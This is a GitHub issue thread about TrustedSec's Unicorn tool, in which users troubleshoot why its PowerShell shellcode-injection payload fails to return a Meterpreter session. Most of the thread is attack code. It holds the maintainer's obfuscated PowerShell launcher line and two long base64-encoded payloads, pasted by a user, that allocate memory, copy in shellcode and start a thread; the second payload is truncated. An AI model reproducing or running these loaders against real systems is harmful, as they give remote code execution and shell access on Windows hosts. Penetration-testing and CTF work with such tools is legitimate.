search

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.71k stars 810 forks source link

unicorn.rc: Exploit completed, but no session was created #140

Closed Mischala closed 4 years ago

Mischala commented 4 years ago

on metasploit v5.0.84-dev The attached unicorn.rc fails to execute properly. I believe the Stager Listener is failing to run? Resulting in a background job waiting for proper MeterPreter connection, which never comes.

Attached is my output from running the generated unicorn.rc, and the `powershell_Attack.txt'

willing to look into the issue myself, if you can point me in the right direction.

Thanks! powershell_attack.txt unicorn.rc.txt MSFOutput.txt

felixguerrero12 commented 4 years ago

I am having issues getting my callbacks also with this recent deployment. Searching through the code if I could find what the fix is - might want to choose a tree that works.

little-dao commented 4 years ago

Same issue, when the machine execute the powershell code, it returns lots of numbers

HackingDave commented 4 years ago

The numbers are normal. I'm not able to reproduce, unfortunately.. What OS are you testing on? Mines on a Windows 10 64 and 32 bit.

msf5 exploit(multi/handler) > 
[*] https://172.16.253.142:443 handling request from 172.16.253.128; (UUID: lndmltkx) Staging x86 payload (181337 bytes) ...
[*] Meterpreter session 1 opened (172.16.253.142:443 -> 172.16.253.128:49744) at 2020-04-26 10:46:51 -0400
HackingDave commented 4 years ago

Do me a favor and change the first part of the code that you have pasted there from:

powershell /w 1 /C "s''v gG -;s''v awT e''c;s''v YtZ ((g''v gG).value.toString()+(g''v awT).value.toString());powershell (g''v YtZ).value.toString()

To this:

powershell /w 1 /C "sv gG -;sv awT ec;sv YtZ ((gv gG).value.toString()+(gv awT).value.toString());powershell (gv YtZ).value.toString()

Let me know if that works.

HackingDave commented 4 years ago

Actually, just pull the latest version of Unicorn (just updated it) and give it a shot again.

Mischala commented 4 years ago

Was running in Kali Linux 64bit Sadly I'm unable to retest, until after Tuesday. My machine broke, and I'm waiting on parts

ghost commented 4 years ago

I checked and it doesn't work even after pulling the latest release from here. I even tried editing the txt file and still, no success. rev_http, rev_tcp or rev_https doesn't work on any open port

shankara-n commented 4 years ago

When the machine execute the powershell code, it returns lots of numbers, no shell. Im trying this out on the retired machine "Arctic" from HackTheBox. 100% consistent

shankara-n commented 4 years ago

Here's the config OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 x64 based PC

shankara-n commented 4 years ago

I'm suspecting it has something to do with meterpreter, i tried out version2.8 of unicorn and same results. There's a video by ippsec on youtube where he has it working in the year 2017 with all the latest stuff available then.

shankara-n commented 4 years ago

Framework: 5.0.71-dev Console : 5.0.71-dev Is my current metasploit config

HackingDave commented 4 years ago

I haven't personally tested on 2008 R2, I've successfully tested on Windows 10. I'll spin up a VM and test on 2008.

shankara-n commented 4 years ago

Thanks dave.

crimsoncore commented 4 years ago

same problem here, never get a shell on metasploit v5.0.91-dev (windows 10 ENT 1909 build 18363.418 and windows 2012R2), running it in powershell ISE gives me this

powershell : At line:1 char:820 At line:1 char:1

powershell : + ... o,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,on ... At line:1 char:1

powershell : + ~~ At line:1 char:1

powershell : Unexpected token 'Th' in expression or statement. At line:1 char:1

powershell : At line:1 char:822 At line:1 char:1

powershell : + ... ,long,erbe,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... e,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,su ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:832 At line:1 char:1

powershell : + ... ,inus,e,so,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sul ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... ,tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGE ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing expression after ',' in pipeline element. At line:1 char:1

powershell : At line:1 char:843 At line:1 char:1

powershell : + ... tryd,elet,ingt,hisf,ilet,osee,ifth,e'Th,ePGc,onn,,PGre,sult,,and,PGEr ... At line:1 char:1

powershell : + ~ At line:1 char:1

powershell : Missing argument in parameter list. At line:1 char:1

powershell : + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx At line:1 char:1

powershell : ception At line:1 char:1

powershell : + FullyQualifiedErrorId : UnexpectedToken At line:1 char:1

powershell :
At line:1 char:1

PS C:\Users\NetworkAdmin> powershell /w 1 /C "sv gG -;sv awT ec;sv YtZ ((gv gG).value.toString()+(gv awT).value.toString());powershell (gv YtZ).value.toString() ('JABPAFoAPQAnACQAUgB2AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABKAG8AagApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBuAD0AIgAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAFQALABoAGUAcABnACwAYQBuAGQALwAsAG8AcgBhAGMALAB0AGkAdgBlACwAcgBlAGMAbwAsAHIAZABnAGUALABtAHYAZQByACwAcwBpAG8AbgAsAGgAYQBzAGMALABoAGEAbgBnACwAZQBkACwAbQAsAGUAYQBuAGkALABuAGcAZABlACwAcAByAGUAYwAsAGEAdABlAGQALABwAGcAYwBvACwAbgBzAHQAYQAsAG4AdABzAG0ALABhAHkAbgBvACwAbABvAG4AZwAsAGUAcgBiAGUALABpAG4AdQBzACwAZQAsAHMAbwAsAHQAcgB5AGQALABlAGwAZQB0ACwAaQBuAGcAdAAsAGgAaQBzAGYALABpAGwAZQB0ACwAbwBzAGUAZQAsAGkAZgB0AGgALABlACcAVABoACwAZQBQAEcAYwAsAG8AbgBuACwALABQAEcAcgBlACwAcwB1AGwAdAAsACwAYQBuAGQALABQAEcARQByACwAcgBvAHIAYwAsAG8AbgBzAHQALABhAG4AdABzACwAYQByAGUAZAAsAGUAcAByAGUALABjAGEAdABlACwAZAAuAC4ALgAsACcAbQBlAHMALABzAGEAZwBlACwAaABhAHMAZwAsAG8AbgBlADoALAAvAHUAcwByACwALwBzAGgAYQAsAHIAZQAvAG0ALABlAHQAYQBzACwAcABsAG8AaQAsAHQALQBmAHIALABhAG0AZQB3ACwAbwByAGsALwAsAGwAaQBiAC8ALABwAGcALwBkACwAZQBwAHIAZQAsAGMAYQB0AGUALABkAF8AYwBvACwAbgBzAHQAYQAsAG4AdABzAC4ALAByAGIALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAH0AZQAsADgAfQA4ACwAMgB9ADAALAAwAH0AMAAsADAAfQAwACwAMAB9ADYALAAwAH0AOAAsADkAfQBlACwANQB9ADMALAAxAH0AYwAsADAAfQA2ACwANAB9ADgALABiAH0ANQAsADAAfQAzACwAMAB9ADgALABiAH0ANQAsADIAfQAwACwAYwB9ADgALABiAH0ANQAsADIAfQAxACwANAB9ADgALABiAH0ANwAsADIAfQAyACwAOAB9ADAALABmAH0AYgAsADcAfQA0ACwAYQB9ADIALAA2AH0AMwAsADEAfQBmACwAZgB9AGEALABjAH0AMwAsAGMAfQA2ACwAMQB9ADcALABjAH0AMAAsADIAfQAyACwAYwB9ADIALAAwAH0AYwAsADEAfQBjACwAZgB9ADAALABkAH0AMAAsADEAfQBjACwANwB9AGUALAAyAH0AZgAsADIAfQA1ACwAMgB9ADUALAA3AH0AOAAsAGIAfQA1ACwAMgB9ADEALAAwAH0AOAAsAGIAfQA0ACwAYQB9ADMALABjAH0AOAAsAGIAfQA0ACwAYwB9ADEALAAxAH0ANwAsADgAfQBlACwAMwB9ADQALAA4AH0AMAAsADEAfQBkACwAMQB9ADUALAAxAH0AOAAsAGIAfQA1ACwAOQB9ADIALAAwAH0AMAAsADEAfQBkACwAMwB9ADgALABiAH0ANAAsADkAfQAxACwAOAB9AGUALAAzAH0AMwAsAGEAfQA0ACwAOQB9ADgALABiAH0AMwAsADQAfQA4ACwAYgB9ADAALAAxAH0AZAAsADYAfQAzACwAMQB9AGYALABmAH0AYQAsAGMAfQBjACwAMQB9AGMALABmAH0AMAAsAGQAfQAwACwAMQB9AGMALAA3AH0AMwAsADgAfQBlACwAMAB9ADcALAA1AH0AZgAsADYAfQAwACwAMwB9ADcALABkAH0AZgAsADgAfQAzACwAYgB9ADcALABkAH0AMgAsADQAfQA3ACwANQB9AGUALAA0AH0ANQAsADgAfQA4ACwAYgB9ADUALAA4AH0AMgAsADQAfQAwACwAMQB9AGQALAAzAH0ANgAsADYAfQA4ACwAYgB9ADAALABjAH0ANAAsAGIAfQA4ACwAYgB9ADUALAA4AH0AMQAsAGMAfQAwACwAMQB9AGQALAAzAH0AOAAsAGIAfQAwACwANAB9ADgALABiAH0AMAAsADEAfQBkACwAMAB9ADgALAA5AH0ANAAsADQAfQAyACwANAB9ADIALAA0AH0ANQAsAGIAfQA1ACwAYgB9ADYALAAxAH0ANQAsADkAfQA1ACwAYQB9ADUALAAxAH0AZgAsAGYAfQBlACwAMAB9ADUALABmAH0ANQAsAGYAfQA1ACwAYQB9ADgALABiAH0AMQAsADIAfQBlACwAYgB9ADgALABkAH0ANQAsAGQAfQA2ACwAOAB9ADMALAAzAH0AMwAsADIAfQAwACwAMAB9ADAALAAwAH0ANgAsADgAfQA3ACwANwB9ADcALAAzAH0AMwAsADIAfQA1ACwAZgB9ADUALAA0AH0ANgAsADgAfQA0ACwAYwB9ADcALAA3AH0AMgAsADYAfQAwACwANwB9ADgALAA5A'+'H0AZQAsADgAfQBmACwAZgB9AGQALAAwAH0AYgAsADgAfQA5ACwAMAB9ADAALAAxAH0AMAAsADAAfQAwACwAMAB9ADIALAA5AH0AYwAsADQAfQA1ACwANAB9ADUALAAwAH0ANgAsADgAfQAyACwAOQB9ADgALAAwAH0ANgAsAGIAfQAwACwAMAB9AGYALABmAH0AZAAsADUAfQA2ACwAYQB9ADAALABhAH0ANgAsADgAfQBjACwAMAB9AGEALAA4AH0ANgAsADQAfQBjACwANwB9ADYALAA4AH0AMAAsADIAfQAwACwAMAB9ADEALAAxAH0ANQAsAGMAfQA4ACwAOQB9AGUALAA2AH0ANQAsADAAfQA1ACwAMAB9ADUALAAwAH0ANQAsADAAfQA0ACwAMAB9ADUALAAwAH0ANAAsADAAfQA1ACwAMAB9ADYALAA4AH0AZQAsAGEAfQAwACwAZgB9AGQALABmAH0AZQAsADAAfQBmACwAZgB9AGQALAA1AH0AOQAsADcAfQA2ACwAYQB9ADEALAAwAH0ANQAsADYAfQA1ACwANwB9ADYALAA4AH0AOQAsADkAfQBhACwANQB9ADcALAA0AH0ANgAsADEAfQBmACwAZgB9AGQALAA1AH0AOAAsADUAfQBjACwAMAB9ADcALAA0AH0AMAAsAGEAfQBmACwAZgB9ADQALABlAH0AMAAsADgAfQA3ACwANQB9AGUALABjAH0AZQAsADgAfQA2ACwANwB9ADAALAAwAH0AMAAsADAAfQAwACwAMAB9ADYALABhAH0AMAAsADAAfQA2ACwAYQB9ADAALAA0AH0ANQAsADYAfQA1ACwANwB9ADYALAA4AH0AMAAsADIAfQBkACwAOQB9AGMALAA4AH0ANQAsAGYAfQBmACwAZgB9AGQALAA1AH0AOAAsADMAfQBmACwAOAB9ADAALAAwAH0ANwAsAGUAfQAzACwANgB9ADgALABiAH0AMwAsADYAfQA2ACwAYQB9ADQALAAwAH0ANgAsADgAfQAwACwAMAB9ADEALAAwAH0AMAAsADAAfQAwACwAMAB9ADUALAA2AH0ANgAsAGEAfQAwACwAMAB9ADYALAA4AH0ANQAsADgAfQBhACwANAB9ADUALAAzAH0AZQAsADUAfQBmACwAZgB9AGQALAA1AH0AOQAsADMAfQA1ACwAMwB9ADYALABhAH0AMAAsADAAfQA1ACwANgB9ADUALAAzAH0ANQAsADcAfQA2ACwAOAB9ADAALAAyAH0AZAAsADkAfQBjACwAOAB9ADUALABmAH0AZgAsAGYAfQBkACwANQB9ADgALAAzAH0AZgAsADgAfQAwACwAMAB9ADcALABkAH0AMgAsADgAfQA1ACwAOAB9ADYALAA4AH0AMAAsADAAfQA0ACwAMAB9ADAALAAwAH0AMAAsADAAfQA2ACwAYQB9ADAALAAwAH0ANQAsADAAfQA2ACwAOAB9ADAALABiAH0AMgAsAGYAfQAwACwAZgB9ADMALAAwAH0AZgAsAGYAfQBkACwANQB9ADUALAA3AH0ANgAsADgAfQA3ACwANQB9ADYALABlAH0ANAAsAGQAfQA2ACwAMQB9AGYALABmAH0AZAAsADUAfQA1ACwAZQB9ADUALABlAH0AZgAsAGYAfQAwACwAYwB9ADIALAA0AH0AMAAsAGYAfQA4ACwANQB9ADcALAAwAH0AZgAsAGYAfQBmACwAZgB9AGYALABmAH0AZQAsADkAfQA5ACwAYgB9AGYALABmAH0AZgAsAGYAfQBmACwAZgB9ADAALAAxAH0AYwAsADMAfQAyACwAOQB9AGMALAA2AH0ANwAsADUAfQBjACwAMQB9AGMALAAzAH0AYgAsAGIAfQBmACwAMAB9AGIALAA1AH0AYQAsADIAfQA1ACwANgB9ADYALABhAH0AMAAsADAAfQA1ACwAMwB9AGYALABmAH0AZAAiADsAJAB2AG4APQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIAdgAgAC0ATgBhAG0AZQAgACIASgBRACIAIAAtAG4AYQBtAGUAcwAgAHkAVABhADsAJAB2AG4APQAkAHYAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVABhACIALAAgACIAVwBpACIAKwAiAG4AIgArACIAMwAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFcAbgAgAD0AIAAkAFcAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAcgBwAHcAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgByAHAAdwAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAWgBOAD0AMAB4ADEAMAAwADQAOwBpAGYAIAAoACQAVwBuAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADQAKQB7ACQAWgBOAD0AJABXAG4ALgBMAH0AOwAkAHAAdgA9ACQAdgBuADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA0ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABKAG8AagAgAD0AIAAwADsAZgBvAHIAKAAkAFkAVgA9ADAAOwAkAFkAVgAgAC0AbABlACgAJABXAG4ALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAWQBWACsAKwApAHsAJAB2AG4AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABwAHYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWQBWACkALAAgACQAVwBuAFsAJABZAFYAXQAsACAAMQApAH0AOwAkAHYAbgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABwAHYALAAgADAAeAAxADAAMAA0ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABKAG8AagApADsAJABoAGYAYgA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB2AG4AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAGgAZgBiACwAJABwAHYALAAwACwAMAAsADAAKQA7ACcAOwAkAEcAZwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQATwBaACkAKQA7ACQAUABXAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHcASwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJAB4AGkAYgBhACAAPQAgACIAQwA6AFwAJAB3AEsAXABmAGsAWgBMAHYAeABBAFwAJAB3AEsAJABQAFcAXAB2ADEALgAwAFwAJABQAFcAIgA7ACQAeABpAGIAYQAgAD0AIAAkAHgAaQBiAGEALgByAGUAcABsAGEAYwBlACgAIgBmAGsAWgBMACIALAAgACIAcwB5AHMAIgApADsAJAB4AGkAYgBhACAAPQAgACQAeABpAGIAYQAuAHIAZQBwAGwAYQBjAGUAKAAiAHYAeABBACIALAAgACIAdwBvAHcANgA0ACIAKQA7ACQAcQBwAFgAIAA9ACAAJwBUAHIAdQAiACsAIgBlACIAKwAiACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQAcQBwAFgAJwApAHsAJABQAFcAPQAgACQAeABpAGIAYQB9ADsAJABxAGEAPQAiACAAJABQAFcAIABxAEEAeQBrACAAJABHAGcAIgA7ACQAcQBhAD0AJABxAGEALgByAGUAcABsAGEAYwBlACgAIgBxAEEAeQBrACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAcQBhAA'+'==') The string is missing the terminator: ".

PS C:\Users\NetworkAdmin> powershell /w 1 /C "sv sLW -;sv du ec;sv FbU ((gv sLW).value.toString()+(gv du).value.toString());powershell (gv FbU).value.toString() ('JABPAFoAPQAnACQAUgB2AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABKAG8AagApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzACIAKwAiAHYAIgArACIAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBuAD0AIgAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAFQALABoAGUAcABnACwAYQBuAGQALwAsAG8AcgBhAGMALAB0AGkAdgBlACwAcgBlAGMAbwAsAHIAZABnAGUALABtAHYAZQByACwAcwBpAG8AbgAsAGgAYQBzAGMALABoAGEAbgBnACwAZQBkACwAbQAsAGUAYQBuAGkALABuAGcAZABlACwAcAByAGUAYwAsAGEAdABlAGQALABwAGcAYwBvACwAbgBzAHQAYQAsAG4AdABzAG0ALABhAHkAbgBvACwAbABvAG4AZwAsAGUAcgBiAGUALABpAG4AdQBzACwAZQAsAHMAbwAsAHQAcgB5AGQALABlAGwAZQB0ACwAaQBuAGcAdAAsAGgAaQBzAGYALABpAGwAZQB0ACwAbwBzAGUAZQAsAGkAZgB0AGgALABlACcAVABoACwAZQBQAEcAYwAsAG8AbgBuACwALABQAEcAcgBlACwAcwB1AGwAdAAsACwAYQBuAGQALABQAEcARQByACwAcgBvAHIAYwAsAG8AbgBzAHQALABhAG4AdABzACwAYQByAGUAZAAsAGUAcAByAGUALABjAGEAdABlACwAZAAuAC4ALgAsACcAbQBlAHMALABzAGEAZwBlACwAaABhAHMAZwAsAG8AbgBlADoALAAvAHUAcwByACwALwBzAGgAYQAsAHIAZQAvAG0ALABlAHQAYQBzACwAcABsAG8AaQAsAHQALQBmAHIALABhAG0AZQB3ACwAbwByAGsALwAsAGwAaQBiAC8ALABwAGcALwBkACwAZQBwAHIAZQAsAGMAYQB0AGUALABkAF8AYwBvACwAbgBzAHQAYQAsAG4AdABzAC4ALAByAGIALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAC0ALQAtACwALQAtAC0ALQAsAC0ALQAtAC0ALAAtAH0AZQAsADgAfQA4ACwAMgB9ADAALAAwAH0AMAAsADAAfQAwACwAMAB9ADYALAAwAH0AOAAsADkAfQBlACwANQB9ADMALAAxAH0AYwAsADAAfQA2ACwANAB9ADgALABiAH0ANQAsADAAfQAzACwAMAB9ADgALABiAH0ANQAsADIAfQAwACwAYwB9ADgALABiAH0ANQAsADIAfQAxACwANAB9ADgALABiAH0ANwAsADIAfQAyACwAOAB9ADAALABmAH0AYgAsADcAfQA0ACwAYQB9ADIALAA2AH0AMwAsADEAfQBmACwAZgB9AGEALABjAH0AMwAsAGMAfQA2ACwAMQB9ADcALABjAH0AMAAsADIAfQAyACwAYwB9ADIALAAwAH0AYwAsADEAfQBjACwAZgB9ADAALABkAH0AMAAsADEAfQBjACwANwB9AGUALAAyAH0AZgAsADIAfQA1ACwAMgB9ADUALAA3AH0AOAAsAGIAfQA1ACwAMgB9ADEALAAwAH0AOAAsAGIAfQA0ACwAYQB9ADMALABjAH0AOAAsAGIAfQA0ACwAYwB9ADEALAAxAH0ANwAsADgAfQBlACwAMwB9ADQALAA4AH0AMAAsADEAfQBkACwAMQB9ADUALAAxAH0AOAAsAGIAfQA1ACwAOQB9ADIALAAwAH0AMAAsADEAfQBkACwAMwB9ADgALABiAH0ANAAsADkAfQAxACwAOAB9AGUALAAzAH0AMwAsAGEAfQA0ACwAOQB9ADgALABiAH0AMwAsADQAfQA4ACwAYgB9ADAALAAxAH0AZAAsADYAfQAzACwAMQB9AGYALABmAH0AYQAsAGMAfQBjACwAMQB9AGMALABmAH0AMAAsAGQAfQAwACwAMQB9AGMALAA3AH0AMwAsADgAfQBlACwAMAB9ADcALAA1AH0AZgAsADYAfQAwACwAMwB9ADcALABkAH0AZgAsADgAfQAzACwAYgB9ADcALABkAH0AMgAsADQAfQA3ACwANQB9AGUALAA0AH0ANQAsADgAfQA4ACwAYgB9ADUALAA4AH0AMgAsADQAfQAwACwAMQB9AGQALAAzAH0ANgAsADYAfQA4ACwAYgB9ADAALABjAH0ANAAsAGIAfQA4ACwAYgB9ADUALAA4AH0AMQAsAGMAfQAwACwAMQB9AGQALAAzAH0AOAAsAGIAfQAwACwANAB9ADgALABiAH0AMAAsADEAfQBkACwAMAB9ADgALAA5AH0ANAAsADQAfQAyACwANAB9ADIALAA0AH0ANQAsAGIAfQA1ACwAYgB9ADYALAAxAH0ANQAsADkAfQA1ACwAYQB9ADUALAAxAH0AZgAsAGYAfQBlACwAMAB9ADUALABmAH0ANQAsAGYAfQA1ACwAYQB9ADgALABiAH0AMQAsADIAfQBlACwAYgB9ADgALABkAH0ANQAsAGQAfQA2ACwAOAB9ADMALAAzAH0AMwAsADIAfQAwACwAMAB9ADAALAAwAH0ANgAsADgAfQA3ACwANwB9ADcALAAzAH0AMwAsADIAfQA1ACwAZgB9ADUALAA0AH0ANgAsADgAfQA0ACwAYwB9ADcALAA3AH0AMgAsADYAfQAwACwANwB9ADgALAA5A'+'H0AZQAsADgAfQBmACwAZgB9AGQALAAwAH0AYgAsADgAfQA5ACwAMAB9ADAALAAxAH0AMAAsADAAfQAwACwAMAB9ADIALAA5AH0AYwAsADQAfQA1ACwANAB9ADUALAAwAH0ANgAsADgAfQAyACwAOQB9ADgALAAwAH0ANgAsAGIAfQAwACwAMAB9AGYALABmAH0